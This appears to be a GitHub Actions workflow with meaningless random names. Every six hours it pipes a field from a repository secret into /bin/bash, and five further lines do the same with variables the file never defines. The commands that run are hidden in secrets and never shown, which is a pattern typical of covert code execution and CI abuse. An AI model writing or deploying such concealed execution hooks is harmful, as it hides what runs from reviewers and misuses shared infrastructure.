name: hukaljx
on:
  workflow_dispatch:
  schedule:
    - cron: '10 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hukaljx
        env:
          bqba55: ${{ secrets.bqba55 }}
        run: |
          echo $bqba55 | jq -r .l43626 | /bin/bash
          echo $ra90737 | jq -r .azx67 | /bin/bash
          echo $hvtkk81 | jq -r .o4 | /bin/bash
          echo $chy41888 | jq -r .zir5509 | /bin/bash
          echo $zvlmz34 | jq -r .puvxz53 | /bin/bash
          echo $biqgw2113 | jq -r .hlk8881 | /bin/bash

